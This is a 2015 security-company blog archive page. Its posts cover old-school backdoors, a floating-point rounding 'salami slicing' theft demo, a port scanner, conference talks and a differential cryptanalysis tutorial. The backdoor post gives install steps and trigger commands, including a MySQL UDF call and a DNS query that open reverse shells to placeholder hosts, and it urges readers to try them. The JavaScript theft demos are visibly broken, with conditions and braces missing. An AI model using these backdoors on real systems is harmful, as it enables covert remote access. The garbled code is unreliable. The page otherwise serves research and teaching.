INSIGHTS | September 8, 2015

The Beauty of Old-school Backdoors

Currently, voodoo advanced rootkit techniques exist for persistence after you’ve got a shell during a pen test. Moreover, there are some bugdoorsimplemented on purpose by vendors, but that’s a different story. Beautiful techniques and code are available these days, but, do you remember that subtle code you used to use to sneak through the door? Enjoy that nostalgia by sharing your favorite one(s) using the #oldschoolbackdoors on social networks.


In this post, I present five Remote Administration Tools (RATs) a.k.a. backdoors that I personally used and admired. It’s important to mention that I used these tools as part of legal pen testing projects in order to show the importance of persistence and to measure defensive effectiveness against such tools.
1. Apache mod_rootme backdoor module (2004)

“mod_rootme is a very cool module that sets up a backdoor inside of Apache where a simple GET request will allow a remote administrator the ability to grab a root shell on the system without any logging.”


One of the most famous tools only required you to execute a simple makecommand to compile the shared object, copy it into the modules directory, insert “LoadModule rootme2_module /usr/lib/apache2/modules/” into httpd.conf, and restart the httpd daemon with ‘apachectl stop; apachectl start’. After that, a simple “GET root” would give you back a w00t shell.


2. raptor_winudf.sql – A MySQL UDF backdoor (2004–2006)

“This is a MySQL backdoor kit based on the UDFs (User Defined Functions) mechanism. Use it to spawn a reverse shell (netcat UDF on port 80/tcp) or to execute single OS commands (exec UDF).”


For this backdoor, you used a simple ‘#mysql -h x.x.x.x < raptor_winudf.sql’to inject the backdoor as a user-defined function. From there, you could execute commands with ‘mysql> select exec(‘ipconfig > c:out.txt’);’ from the MySQL shell.


A cool reverse-shell feature was implemented as well and could be called with ‘mysql> select netcat(‘y.y.y.y’);’ in order to send an interactive shell to port 80 on the host supplied (y.y.y.y). The screenshot below shows the variant for Linux.

Screenshot source: (no longer active)
3. Winamp get_wbkdr.dll plugin backdoor (2006)

“wbkdr is a proof of concept Winamp backdoor that makes use of the plugin interface. It spawns cmd.exe on port 24501.”


This one was as easy as copying the DLL into C:Program FilesWinampPlugins and playing your favorite song with Winamp in order to get a pretty cmd.exeattached to the port 24501.


4. BIND reverse shell backdoor (2005)
This backdoor used an unpublished patch for BIND, the most used DNS daemon on the Internet, developed by a friend of mine from Argentina. Basically you had to patch the source, compile and run named, as root normally. Once running, sending a DNS request with ‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ would trigger a reverse shell to the host x.x.x.x on the port given.
5. Knock-out – a port-knocking based backdoor (2006)

This is backdoor I made using libpcap for packet sniffing (server) and libnet for packet crafting (client). I made use of the port-knocking technique to enable the backdoor, which could be a port bind or a reverse shell. The server and client use the same configuration file to determine which ports to knock and the time gap between each network packet sent. Knock-out supports TCP and UDP and is still working on recent Linux boxes (tested under Ubuntu Server 14.04).


I’d say most of these backdoors still work today. You should try them out. Also, I encourage you to share the rarest backdoors you ever seen, the ones that you liked the most, and the peculiar ones you tried and fell in love with. Don’t forget to use the #oldschoolbackdoors hashtag ;-).

ADVISORIES | September 3, 2015

Admin ACL Bypass and Double Fetch Issue in F-Secure Internet Security 2015

Local users of F-Secure Internet Security 2015 could elevate their privileges to local admin/system/kernel. (more…)

INSIGHTS | August 25, 2015

Money may grow on trees

Sometimes when buying something that costs $0.99 USD (99 cents) or $1.01 USD (one dollar and one cent), you may pay an even dollar. Either you or the cashier may not care about the remaining penny, and so one of you takes a small loss or profit.


Rounding at the cash register is a common practice, just as it is in programming languages when dealing with very small or very large numbers. I will describe here how an attacker can make a profit when dealing with the rounding mechanisms of programming languages.
Lack of precision in numbers

IEEE 754 standard has defined floating point numbers for more than 30 years. The requirements that guided the formulation of the standard for binary floating-point arithmetic provided for the development of very high-precision arithmetic.


The standard defines how operations with floating point numbers should be performed, and also defines standard behavior for abnormal operations. It identifies five possible types of floating point exceptions: invalid operation (highest priority), division by zero, overflow, underflow, and inexact (lowest priority).


We will explore what happens when inexact floating point exceptions are triggered. The rounded result of a valid operation can be different from the real (and sometimes infinitely precise) result and certain operations may go unnoticed.
Rounding takes an exact number and, if necessary, modifies it to fit in the destination’s format. Normally, programming languages do not alert for the inexact exception and instead just deliver the rounded value. Nevertheless, documentation for programming languages contains some warnings about this:


To exemplify this matter, this is how the number 0.1 looks internally in Python:


The decimal value 0.1 cannot be represented precisely when using binary notation, since it is an infinite number in base 2. Python will round the previous number to 0.1 before showing the value.
Salami slicing the decimals

Salami slicing refers to a series of small actions that will produce a result that would be impossible to perform all at once. In this case, we will grab the smallest amount of decimals that are being ignored by the programming language and use that for profit.


Let’s start to grab some decimals in a way that goes unnoticed by the programming language. Certain calculations will trigger more obvious differences using certain specific values. For example, notice what happens when using v8 (Google’s open source JavaScript engine) to add the values 0.1 plus 0.2:


Perhaps we could take some of those decimals without JavaScript noticing:




But what happens if we are greedy? How much can we take without JavaScript noticing?

That’s interesting; we learned that it is even possible to take more than what was shown, but no more than 0.00000000000000008 from that operation before JavaScript notices.
I created a sample bank application to explain this, pennies.js:
// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
    return 1; // Error! The account can not have a negative balance
  return 0;
// This is used to print the balance
function print_balance(time) {
  print(” The balance of the bank accounts is:”);
  print(” Account 0: “+account[0]+” u$s”);
  print(” Account 1: “+account[1]+” u$s (profit)”);
  print(” Overall money: “+(account[0]+account[1]))
  if(typeof time !== ‘undefined’) {
     print(” Estimated daily profit: “+( (60*60*24/time) * account[1] ) );
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // I will save my profit here 
account = new Array();
initial_deposit = 1000000;
profit = 0
print(“n1) Searching for the best profit”);
for(i = 0.000000000000000001; i < 0.1; i+=0.0000000000000000001) {
  wire(1, i, 0); // I will transfer some cents from the account 0 to the account 1
  if(account[0]==initial_deposit && i>profit) {
    profit = i;
 //   print(“I can grab “+profit.toPrecision(21));
  } else {
print(”   Found: “+profit.toPrecision(21));
print(“n2) Let’s start moving some money:”);
start = new Date().getTime() / 1000;
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer some cents from the account 0 to the account 1
  finish = new Date().getTime() / 1000;

The attack against it will have two phases. In the first phase, we will determine the maximum amount of decimals that we are allowed to take from an account before the language notices something is missing. This amount is related to the value from which we are we taking: the higher the value, the higher the amount of decimals. Our Bank Account 0 will have $1,000,000 USD to start with, and we will deposit our profits to a secondary Account 1:


Due to the decimals being silently shifted to Account 1, the bank now believes that it has more money than it actually has.


Another possibility to abuse the loss of precision is what happens when dealing with large numbers. The problem becomes visible when using at least 17 digits.

Now, the sample attack application will occur on a crypto currency, fakecoin.js:


// This is used to wire money
function wire(deposit, money, withdraw) {
  account[deposit] += money;
  account[withdraw] -= money;
  if(account[withdraw]<0) {
    return 1; // Error! The account can not have a negative balance
  return 0;
// This is used to print the balance
function print_balance(time) {
  print(” The general balance is:”);
  print(” Crypto coin:  “+crypto_coin);
  print(” Crypto value: “+crypto_value);
  print(” Crypto cash:  “+(account[0]*crypto_value)+” u$s”);
  print(” Account 0: “+account[0]+” coins”);
  print(” Account 1: “+account[1]+” coins”);
  print(” Overall value: “+( ( account[0] + account[1] ) * crypto_value )+” u$s”)
  if(typeof time !== ‘undefined’) {
     seconds_in_a_day = 60*60*24;
     print(” Estimated daily profit: “+( (seconds_in_a_day/time) * account[1] * crypto_value) +” u$s”);
// This is used to set the default initial values
function reset_values() {
  account[0] = initial_deposit;
  account[1] = 0; // profit
// My initial money
initial_deposit = 10000000000000000;
crypto_coin = “Fakecoin”
crypto_value = 0.00000000011;
// Here I have my bank accounts defined
account = new Array();
print(“n1) Searching for the best profit”);
profit = 0
for (j = 1; j < initial_deposit; j+=1) {
  wire(1, j, 0); // I will transfer a few cents from the account 0 to the account 1
  if(account[0]==initial_deposit && j > profit) {
    profit = j;
  } else {
print(”   Found: “+profit);
start = new Date().getTime() / 1000;
print(“n2) Let’s start moving some money”);
for (j = 0; j < 10000000000; j++) {
  for (i = 0; i < 1000000000; i++) { 
    wire(1, profit, 0); // I will transfer my 29 cents from the account 0 to the account 1
  finish = new Date().getTime() / 1000;
We will buy 10000000000000000 units of Fakecoin (with each coin valued at $0.00000000011 USD) for a total value of $1,100,000 USD. We will transfer one Fakecoin at the time from Account 0 to a second account that will hold our profits (Account 1). JavaScript will not notice the missing Fakecoin from Account 0, and will allow us to profit a total of approximately $2,300 USD per day:

Depending on the implementation, a hacker can used either float numbers or large numbers to generate money out of thin air.
In conclusion, programmers can avoid inexact floating point exceptions with some best practices:
  • If you rely on values that use decimal numbers, use specialized variables like BigInteger in Java.
  • Do not allow values larger than 16 digits to be stored in variables and truncate decimals, or
  • Use libraries that rely on quadruple precision (that is, twice the amount of regular precision).


WHITEPAPER | August 5, 2015

Remote Exploitation of an Unaltered Passenger Vehicle

Since 2010, several automotive security researchers have demonstrated the ability to inject messages into the CAN bus of a car, capable of affecting the physical systems of the vehicle. The widespread criticism of these methods as viable attack vectors was the claim that there was not a way for an attacker to inject these types of messages without close physical access to the vehicle.

In this paper, Chris Valasek and Charlie Miller demonstrate that remote attacks against unaltered vehicles is possible. (more…)

INSIGHTS | July 30, 2015

Saving Polar Bears When Banner Grabbing

As most of us know, the Earth’s CO2 levels keep rising, which directly contributes to the melting of our pale blue dot’s icecaps. This is slowly but surely making it harder for our beloved polar bears to keep on living. So, it’s time for us information security professionals to help do our part. As we all know, every packet traveling over the Internet is processed by power hungry CPUs. By simply sending fewer packets, we can consume less electricity while still get our banner grabbing, and subsequently our work, done.

But first a little bit of history. Back in the old days, port scanners were very simple. Some of the first scanners out there were probe_tcp_ports (published in Phrack #46) and pscan.c by pluvius. The first scanner I found that actually managed to use non-blocking I/O was strobe written by Proff, more commonly known nowadays as Julian Assange, somewhere in 1995. Using non-blocking I/O obviously made it a lot faster.
In 1996, scantcp.c written by Uriel Maimon (published in Phrack #49) became one of the first scanners to use half-open/SYN scanning. This was followed by the introduction of nmap by Fyodor Lyon in The Art of Port Scanning (published in Phrack #51) in 1997.
Of course, any security person worth his salt knows nmap and is at least familiar with a good subset of the myriad of scanning techniques it implements. But, in many cases, when scanning for TCP ports we want results as quickly as possible, so we can get a list of open ports we can connect to from the source address that we’re scanning and subsequently identify the services behind those ports.
To determine if a port is open, we sent out a SYN packet and watch for one of several things to happen. Assuming there are no firewalls or routing issues, the receiving TCP/IP stack will either:
  •  Send a packet with the RST flag set, which means the port is closed and the host is not accepting connections on that port.
  • Send a packet with the SYN and ACK flags set, which means the host is accepting the connection. The Operating System under which nmap runs doesn’t know anything about the outgoing SYN packet (as it was created in raw mode), and subsequently it will send back an RST packet as a reply.

To summarize see the following image from (courtesy of the nmap book)
This is great, as we can now list the open ports, and this forms the basis of half-open/SYN scanning. However, one thing that nmap does is track the number of outstanding probes and retransmit them a number of times if no response is received in a timely fashion. This leads to a lot of complexity, and it makes scanning slower too. Besides that, standard scanning modes do not offer protection against an adversary who is feeding wrong responses down the pipe. So nmap can, under such circumstances, claim that a port is open when it is not, or vice versa.
This lead to some efforts to protect the outgoing SYN probes by cryptographically signing them. The first known public release of this was scanrand by Dan Kaminsky introduced in his collection of Paketto Kereitsu utilities. It generates and fires off packets as quickly as possible. Each SYN probe is protected by a cryptographic cookie based on an HMAC calculated over the 4-tuple identifying the connection (the source and destination IP addresses and ports) and a randomly generated secret. As a valid reply for an open port needs to be sent back with an incremented TCP ACK value, it’s easy to recalculate the original cookie and deduce if it was indeed a response to a packet sent out by the scanner. This completely eliminates the need to keep state, although a bit of packet loss can mean some probes may get lost and won’t be retransmitted, and as such not all open ports will be discovered.
So that’s all great. But what’s one of the first things we do after discovering an open port? Connect to it properly. Possibly to do a banner grab or a version scan or just to see what the heck is behind this port. Now when it comes to standard IANA port assignments, in most cases, it’s relatively clear what’s behind a port. If open, port 22 is most likely SSH, port 80 HTTP, port 143 IMAP etc. But we still want to check.
So what happens if you do an nmap version scan? Or a simple banner grab after a port scan? After receiving a SYN|ACK reply from an open port, the scanner jots down that the port is open, and then connects to it. The only way to do this is to go through libc and the kernel and do a full TCP connect() call. This will result in another SYN – SYN|ACK – ACK exchange on the wire before any data can actually be exchanged. Combining that with the original SYN – SYN|ACK – RST exchange, that’s a total of three potentially unnecessary packets being exchanged.
So how would one go about solving this? There are a few approaches. One is by patching the host kernel and enabling an API that allows us to send out raw SYN probes without keeping any state. By then adding a callback API when valid SYN|ACK packets are received, we would have a mechanism to turn these connections into valid file descriptors. But that means writing a lot of complicated kernel code.
The other approach is to use a userland TCP/IP stack. These work exactly the same as any normal TCP/IP stack, but they just run in userspace. That makes it easier to integrate them into scanners and modify them without having to deal with complicated custom kernel modules.
As I wrote several scanners over the years, I always wanted to have a good userland TCP/IP stack, but I never saw one that fit my needs or whose code quality I actually liked. And writing one myself seemed like a lot of work, so I shied away from it.
Anyhow, ever seen the movie American Beauty? Where Kevin Spacey’s wife comes home and asks him about the 1970 Pontiac Firebird out on the driveway which he bought with the money received from blackmailing his former boss? It’s such a great scene; “the car I’ve always wanted and now I have it. I rule”.
That’s sort of how I felt when I stumbled over Patrick Kelsey’s libuinet. The userland TCP/IP stack I’ve always wanted and now I have it. I rule!! It’s a port of the FreeBSD TCP/IP stack with kernel paradigms ported back on userland libraries, such as POSIX threads. It’s great, and with a bit of fiddling, I got it to work on Linux too.
That enabled me to combine the two ideas into just one port scanner; the stateless SYN scanning first introduced in scanrand and the custom TCP/IP stack. Now I can immediately resume doing a banner grab or sending a request without having to do another TCP connect() call. To prevent the hosting Linux kernel from interfering and sending a RST packet, an iptables firewall rule will be inserted. Otherwise, the userland TCP/IP stack will try to pick up the connection from the SYN|ACK but then the Linux kernel has already frontran it and will have sent the RST out. After this was figured out, tying everything else together in the tool was relatively easy, thus, polarbearscan was born.
The above approach saves us from sending a couple of packets. And thus saves CPU cycles. And so we can hopefully give the polar bears a few more years. The code for the polarbear scanner can be found here,and instructions on how to compile it and get it up and running on Linux systems are inside in the README in the distribution.
A sample run of the tool doing a standard banner grab for port 21, 22, 143 (FTP, SSH, IMAP) with a bandwidth limitation for outgoing SYN probes of just 10kbps and scanning a /20 range will yield something like this:
$ sudo ./pbscan -10k –sB –p21,22,143 x.x.x.x/20

seed: 0xb21f7f4e, iface: eth0, src: (id: 54321, ttl: 64, win: 65535)
x.x.x.6:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.6:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.14:21 (t/o: 0s)
x.x.x.15:21 (t/o: 0s)
x.x.x.16:21 (t/o: 0s)
x.x.x.8:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.8:21 -> 220 ProFTPD 1.3.3e Server ready.
x.x.x.10:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.10:21 -> 220 ProFTPD 1.3.5 Server ready.
x.x.x.9:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.9:21 -> 220 ProFTPD 1.3.3e Server ready.
x.x.x.17:21 (t/o: 0s)
x.x.x.11:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.7:21 -> 220 Core FTP Server Version 1.2, build 369 Registered
x.x.x.11:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.13:21 -> 220 ProFTPD 1.3.4d Server ready.
x.x.x.13:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.14:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
x.x.x.15:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2
x.x.x.16:22 -> SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2
x.x.x.18:22 -> SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze5
x.x.x.19:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.19:21 -> 220———- Welcome to Pure-FTPd [privsep] [TLS] ———-
x.x.x.21:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.22:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.25:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.26:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.27:22 -> SSH-2.0-OpenSSH_4.3
x.x.x.36:22 -> SSH-2.0-OpenSSH_5.3
x.x.x.38:22 -> SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
x.x.x.40:22 -> SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2
x.x.x.17:22 (t/o: 5s)
x.x.x.35:22 (t/o: 5s)
x.x.x.37:22 (t/o: 5s)
x.x.x.239:22 -> SSH-2.0-OpenSSH_5.1p1 Debian-5
x.x.x.100:22 (t/o: 5s)
x.x.x.124:22 (t/o: 6s)
x.x.x.242:22 (t/o: 5s)

The tool also has the ability to do more than a passive banner grab. It includes other scan modes in which it will try to identify TLS servers by sending it a TLS NULL probe and identify HTTP servers.

EDITORIAL | July 29, 2015

Black Hat and DEF CON: Hacks and Fun

The great annual experience of Black Hat and DEF CON starts in just a few days, and we here at IOActive have a lot to share. This year we have several groundbreaking hacking talks and fun activities that you won’t want to miss!

For Fun
Join IOActive for an evening of dancing

Our very own DJ Alan Alvarez is back – coming all the way from Mallorca to turn the House of Blues RED. Because no one prefunks like IOActive.
Wednesday, August 5th
House of Blues
Escape to the IOAsis – DEF CON style!
We invite you to escape the chaos and join us in our luxury suite at Bally’s for some fun and great networking.  
Friday, August 7th12–6PM
Bally’s penthouse suite
·      Unwind with a massage 
·      Enjoy spectacular food and drinks 
·      Participate in discussions on the hottest topics in security 
·      Challenge us to a game of pool! 
After a two year hiatus, we’re bringing back the party and taking it up a few notches. Join DJs Stealth Duck, Alan Alvarez, and Keith Myers as they get our booties shaking. All are welcome! This is a chance for the entire community to come together to dance, swim, laugh, relax, and generally FREAK out!
And what’s a FREAKFEST without freaks? We are welcoming the community to go beyond just dancing and get your true freak on.
Saturday, August 8th
10PM till you drop
Bally’s BLU Pool
For Hacks
Escape to the IOAsis – DEF CON style!
Join the IOActive research team for an exclusive sneak peek into the world of IOActive Labs. 
Friday, August 7th
Bally’s penthouse suite
Enjoy Lightning Talks with IOActive Researchers:
Straight from our hardware labs, our brilliant researchers will talk about their latest findings in a group of sessions we like to call IOActive Labs Presents:
·      Mike Davis & Michael Milvich: Lunch & Lab – an overview of the IOActive Hardware Lab in Seattle
Robert Erbes: Little Jenny is Export Controlled: When Knowing How to Type Turns 8th-graders into Weapons 
·      Vincent Berg: The PolarBearScan
·      Kenneth Shaw: The Grid: A Multiplayer Game of Destruction 
·      Andrew Zonenberg: The Anti Taco Device: Because Who Doesn’t Go to All This trouble? 
·      Sofiane Talmat: The Dark Side of Satellite TV Receivers 
·      Fernando Arnaboldi: Mathematical Incompetence in Programming Languages 
·      Joseph Tartaro: PS4: General State of Hacking the Console
·      Ilja Van Sprundel: An Inside Look at the NIC Minifilter
Black Hat/DEF CON
Speaker: Chris Valasek
Remote Exploitation of an Unaltered Passenger Vehicle
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 2PM Saturday, August 8, 2015
In case you haven’t heard, Dr. Charlie Miller and I will be speaking at Black Hat and DEF CON about our remote compromise of a 2014 Jeep Cherokee ( While you may have seen media regarding the project, our presentation will examine the research at much more granular level. Additionally, we have a few small bits that haven’t been talked about yet, including some unseen video, along with a 90-page white paper that will provide you with an abundance of information regarding vehicle security assessments. I hope to see you all there!
Speaker: Colin Cassidy
Switches get Stitches
Black Hat: 3PM Wednesday, August 5, 2015
DEF CON: 4PM Saturday, August 8, 2015
Have you ever stopped to think about the network equipment between you and your target? Yeah, we did too. In this talk we will be looking at the network switches that are used in industrial environments, like substations, factories, refineries, ports, or other homes of industrial automation. In other words: DCS, PCS, ICS, and SCADA switches.
We’ll be attacking the management plane of these switches because we already know that most ICS protocols lack authentication and cryptographic integrity. By compromising the switches an attacker can perform MITM attacks on a live processes.

Not only will we reveal new vulnerabilities, along with the methods and techniques for finding them, we will also share defensive techniques and mitigations that can be applied now, to protect against the average 1-3 year patching lag (or even worse, “forever-day” issues that are never going to be patched).


Speaker: Damon Small
Beyond the Scan: The Value Proposition of Vulnerability Assessment
DEF CON: 2PM Thursday, August 6, 2015
It is a privilege to have been chosen to present at DEF CON 23. My presentation, “Beyond the Scan: The Value Proposition of Vulnerability Assessment”, is not about how to scan a network; rather, it is about how to consume the data you gather effectively and how to transform it into useful information that will affect meaningful change within your organization.
As I state in my opening remarks, scanning is “Some of the least sexy capabilities in information security”. So how do you turn such a base activity into something interesting? Key points I will make include:
·      Clicking “scan” is easy. Making sense of the data is hard and requires skilled professionals. The tools you choose are important, but the people using them are critical.
·      Scanning a few, specific hosts once a year is a compliance activity and useful only within the context of the standard or regulation that requires it. I advocate for longitudinal studies where large numbers of hosts are scanned regularly over time. This reveals trends that allow the information security team to not only identify missing patches and configuration issues, but also to validate processes, strengthen asset management practices, and to support both strategic and tactical initiatives.

I illustrate these concepts using several case studies. In each, the act of assessing the network revealed information to the client that was unexpected, and valuable, “beyond the scan.”


Speaker: Fernando Arnaboldi
Abusing XSLT for Practical Attacks
Black Hat: 3:50PM Thursday, August 6, 2015
DEF CON: 2PM Saturday, August 8, 2015
XML and XML schemas (i.e. DTD) are an interesting target for attackers. They may allow an attacker to retrieve internal files and abuse applications that rely on these technologies. Along with these technologies, there is a specific language created to manipulate XML documents that has been unnoticed by attackers so far, XSLT.

XSLT is used to manipulate and transform XML documents. Since its definition, it has been implemented in a wide range of software (standalone parsers, programming language libraries, and web browsers). In this talk I will expose some security implications of using the most widely deployed version of XSLT.


Speaker: Jason Larsen
Remote Physical Damage 101 – Bread and Butter Attacks

Black Hat: 9AM Thursday, August 6, 2015


Speaker: Jason Larsen
Rocking the Pocket Book: Hacking Chemical Plant for Competition and Extortion

DEF CON:  6PM Friday, August 7, 2015


Speaker: Kenneth Shaw
The Grid: A Multiplayer Game of Destruction
DEF CON: 12PM Sunday, August 9, 2015, IoT Village, Bronze Room

Kenneth will host a table in the IoT Village at DEF CON where he will present a demo and explanation of vulnerabilities in the US electric grid.


Speaker: Sofiane Talmat
Subverting Satellite Receivers for Botnet and Profit
Black Hat: 5:30PM Wednesday, August 5, 2015
Security and the New Generation of Set Top Boxes
DEF CON: 2PM Saturday, August 8, 2015, IoT Village, Bronze Room
New satellite TV receivers are revolutionary. One of the devices used in this research is much more powerful than my graduation computer, running a Linux OS and featuring a 32-bit RISC processor @450 Mhz with 256MB RAM.

Satellite receivers are massively joining the IoT and are used to decrypt pay TV through card sharing attacks. However, they are far from being secure. In this upcoming session we will discuss their weaknesses, focusing on a specific attack that exploits both technical and design vulnerabilities, including the human factor, to build a botnet of Linux-based satellite receivers.


Speaker: Alejandro Hernandez
Brain Waves Surfing – (In)security in EEG (Electroencephalography) Technologies
DEF CON: 7-7:50PM Saturday, August 8, 2015, BioHacking Village, Bronze 4, Bally’s

Electroencephalography (EEG) is a non-invasive method for recording and studying electrical activity (synapse between neurons) of the brain. It can be used to diagnose or monitor health conditions such as epilepsy, sleeping disorders, seizures, and Alzheimer disease, among other clinical uses. Brain signals are also being used for many other different research and entertainment purposes, such as neurofeedback, arts, and neurogaming.


I wish this were a talk on how to become Johnny Mnemonic, so you could store terabytes of data in your brain, but, sorry to disappoint you, I will only cover non-invasive EEG. I will cover 101 issues that we all have known since the 90s, that affect this 21st century technology.


I will give a brief introduction of Brain-Computer Interfaces and EEG in order to understand the risks involved in brain signal processing, storage, and transmission. I will cover common (in)security aspects, such as encryption and authentication as well as (in)security in design. Also, I will perform some live demos, such as the visualization of live brain activity, sniffing of brain signals over TCP/IP, as well as software bugs in well-known EEG applications when dealing with corrupted brain activity files. This talk is a first step to demonstrating that many EEG technologies are vulnerable to common network and application attacks.
RESEARCH | July 24, 2015

Differential Cryptanalysis for Dummies

Recently, I ventured into the crazy world of differential cryptanalysis purely to find out what the heck it was all about. In this post, I hope to reassure you that this strange and rather cool technique is not as scary as it seems. Hopefully, you’ll be attacking some ciphers of your own in no time!

A differential cryptanalysis attack is a method of abusing pairs of plaintext and corresponding ciphertext to learn about the secret key that encrypted them, or, more precisely, to reduce the amount of time needed to find the key. It’s what is called a chosen plaintext attack; the attacker has access to plaintext and corresponding ciphertext.

We’re going to attack a simple block cipher I stole using another explanation of the technique (links are available at the bottom of the post). This cipher is meant to exhibit a few rudimentary elements of a Substitution-Permutation Network (SPN) (minus some common elements for simplicity), while highlighting the power of the differential technique. So, let’s get started.

I think a good place to start is to look at the block cipher and check out what makes it tick. Here is a quick schematic of the algorithm:


  • C  is the cipher-text
  • K_0, K_1 are the first and second round keys, respectively
  • P is the plaintext
  • SBOX is the substitution box.

As you can probably guess from looking at the schematic,: the cipher takes in two 2 sub-keys (K_0,K_1) and a piece of plain-text. It, it then XORs the plain-text with the first key, K_0, then, afterwards pulls the plain-text through a substitution box (SBOX) (we will talk about this little gadget soon). From there, it then takes the output of the SBOX, and XORs it with K_01,  and then pulls it through the SBOX again to produce the file piece of final cipher-text. So now that we know how the cipher works, and we can begin formulating our attack.!

To start off with, let’s try writing down this cipher in an algebraic form: 

C=SBOX(SBOX(P⨁K_0 )⨁K_1 )


Great! We can start talking about some of the weird properties of this cipher.

We know that when it comes to the cryptographic security of an encryption function the only thing that should be relied on for Confidentiality is your secret key (these are the words of a great Dutch cryptographer a long time ago []). This means the algorithm, including the workings of the SBOXs, will be known (or rather, in our analysis, we should always assume it will be known) by our attacker. Anything secret in our algorithm cannot be relied on for security. More specifically, any operation that is completely reversible (requiring only knowledge of the ciphertext) is useless!

When it comes to the use of substitution boxes, unless something we don’t know meaningfully obscures the output of the SBOX, using it will not add any security. It will be reduced to a mere reversible “encoding” of its input.

Looking at the algebraic form in (1), we can see the cipher pulls the input through the SBOX again in its last operation before returning it as ciphertext. This operation adds no security at all, especially in the context of a differential attack, because it is trivial to reverse the effect of the last SBOX. To make this clear, imagine knowing the output of the SBOX, but not being capable of knowing the input. Given the context of the last SBOX, this is impossible if you know the ciphertext. We can reduce the encryption function and focus on what actually adds security. The function becomes:

C= SBOX(P⨁K_0 )⨁K_1

Ironically, the SBOX in this expression (2), is now the only thing that adds security, so it will be the target of our analysis. Consider what would happen if we could know the output of the SBOX, including the plaintext/ciphertext pairs. The entire security of the cipher would fly out the window. After a few XOR operations, we would be able to work out the second key, and by extrapolation, the first key.

But how would we know the SBOX output? Well, what about analyzing the way the SBOX behaves by observing how differences between inputs map to differences in outputs. This insight is at the heart of differential cryptanalysis! Why choose this property? The only thing we have access to is plaintext/ciphertext pairs in a differential cryptanalysis attack (thems the rules), so we need to derive our information from this data. Also, XOR differences have favorable properties under XOR, namely they are unaffected by them. If we look at how the SBOX maps these differences, this is what we get:

[(x,x^’), (y,y^’)]
[(0, 15), (3, 7)]
[(3, 12), (10, 13)]
[(4, 11), (4, 2)] [(5, 10), (9, 15)]
[(3, 6), (10, 5)]
[(0, 5), (3, 9)] [(1, 4), (14, 4)]
[(1, 2), (14, 1)]
[(5, 6), (9, 5)] [(13, 14), (12, 0)]
[(8, 11), (8, 2)] [(12, 15), (13, 7)]
[(11, 14), (2, 0)]
[(8, 13), (8, 12)]
[(2, 7), (1, 6)]
[(9, 12), (11, 13)]
[(10, 15), (15, 7)]
[(10, 14), (15, 0)]
[(3, 7), (10, 6)]
[(14, 15), (0, 7)]
[(12, 13), (13, 12)]
  • ∆x = x⊕x^’
  • ∆y = y⊕y^’
  • x^’,x is the input pair to the SBOX
  • y’,y is the output pair of from the SBOX
  • And ∆x→ ∆y is a differential characteristic
  • Count is the number of times the differential characteristic appears
This table is a small sample of the data collected from the SBOX.

This mapping of the XOR difference in the input to the XOR difference in the output is called a differential characteristic. Hence the name, “differential” cryptanalysis.! We can now use this data to steal the secret key.! Given the cipher-text/plain-text pairs, we need to find one encrypted under our target key that satisfies one of the differential characteristics. To find that pair you need to do the following:

Consider a sample differential characteristic a →b (this can be any differential):
  1. Choose (or generate) one plain-text P, and produce another plain-text P^’=P⨁a , where a is an input differential (notice that the XOR difference of P and P’ is a!)
  2. Encrypt the two plain-texts (P,P’) to get (C,C’)
  3. If C⨁C’ = b,  then you have a good pair!

If you know that a →b is the differential that suits your text pair, you now know what the potential input/output pairs are for the SBOX, because of thanks to the analysis we did earlier on. ! So now given these pairs, you can try different calculations for the key. You will likely have a couple possible keys, but one of them will definitely be the correct one.

For example, let’s say we have the following setup:

The keys K_0, K_1 : 0,6
 (p,p’) :=> (c,c’) : input_diff :=> output_diff : [count, [(sI,sI’),(sO,sO’)]… ]
 (3,12) -> (11, 12) : 15 :=> 7 : [1, [[(3, 12), (10, 13)]]]
 (5,10) -> (9, 15) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (4,11) -> (4, 2) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (5,10) -> (9, 15) : 15 :=> 6 : [2, [[(4, 11), (4, 2)], [(5, 10), (9, 15)]]]
 (3,6) -> (3, 12) : 5 :=> 15 : [1, [[(3, 6), (10, 5)]]]

The script that generated this output is available at the end of the post.

We need to select a plain-text/cipher-text pair and use the information associated to with them the pair to calculate the key.  So for example let’s use, using (3,12) => (11,12), we can then calculate the K_0, K_1 in the following way:

Given then that (from the last operation of the cipher):

C=K_1⊕ S_o

We know that (because of how XOR works):

K_1=C⊕ S_o

Although we have a couple of choices for those values, so we need to run through them.
Given that:
C=(11,12) this is a tuple because we are using a pair of cipher-texts
We can then try to calculate the second round key as:
K_1=C[0]⊕ S_o [0]=1   wrong!
K_1=C[0]⊕ S_o [1]=6   right!
We can also calculate K_0, namely:
K_0=P[1]⊕ S_i [0]=   wrong!
K_0=C[0]⊕ S_o [1]=   wrong!
K_0=C[0]⊕ S_o [0]=0    right!
We’ve just derived the two sub keys.! Cryptanalysis successful!
